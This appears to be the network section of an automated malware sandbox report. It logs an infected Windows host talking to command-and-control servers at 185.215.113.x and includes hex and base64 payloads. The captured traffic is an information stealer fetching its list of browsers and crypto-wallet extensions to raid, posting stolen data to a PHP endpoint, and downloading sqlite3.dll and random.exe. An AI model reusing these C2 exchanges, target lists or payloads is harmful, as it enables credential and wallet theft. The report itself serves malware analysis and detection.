                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Content-Length: 2028
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:43.402729988 CET124INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                                                                            Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdT
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:43.612797976 CET896INData Raw: 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 78 44 61 47 56 6b 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46
                                                                                                                                                                                                                                                                                                            Data Ascii: dGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHB
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:43.614202976 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073452950 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:43 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Content-Length: 7116
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073477983 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                                                                            Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073491096 CET1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                                                                                            Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073658943 CET1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                                                                                                                                                                                                                                                            Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073671103 CET1236INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                                                                                                                                                                                                                                                            Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.073682070 CET1164INData Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57
                                                                                                                                                                                                                                                                                                            Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.075351954 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBG
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36 33 39 38 34 66 34 30 61 36 62 33 62 64 33 35 38 34 39 65 30 31 37 32 34 31 65 62 66 65 33 66 36 35 32 38 64 62 30 31 63 34 66 36 33 36 64 33 38 62 62 32 30 34 37 37 30 62 62 63 35 38 34 39 35 62 63 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="message"fplugins------CFCGIIEHIEGDGDGCAEBG--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.533113956 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:44 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Content-Length: 108
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.560933113 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Content-Length: 6767
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:44.561005116 CET6767OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 38 32 36 61 36
                                                                                                                                                                                                                                                                                                            Data Ascii: ------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="token"5826a63984f40a6b3bd35849e017241ebfe3f6528db01c4f636d38bb204770bbc58495bc------FIEHDBGDHDAECBGDHJKFContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:45.665754080 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:44 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:46.096981049 CET94OUTGET /68b591d6548ec281/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:46.553442001 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:46 GMT
                                                                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                                            ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Content-Length: 1106998
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:46.553543091 CET1236INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii: #N@B/81s:<R@B/92P @B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:46.560425997 CET1236INData Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26
                                                                                                                                                                                                                                                                                                            Data Ascii: tu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            10192.168.2.449850185.215.113.16802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:41.323739052 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711240053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:42 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 921600
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:12 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10dc-e1000"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 10 3f 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 60 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL?g"`w@p@@@d|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711255074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
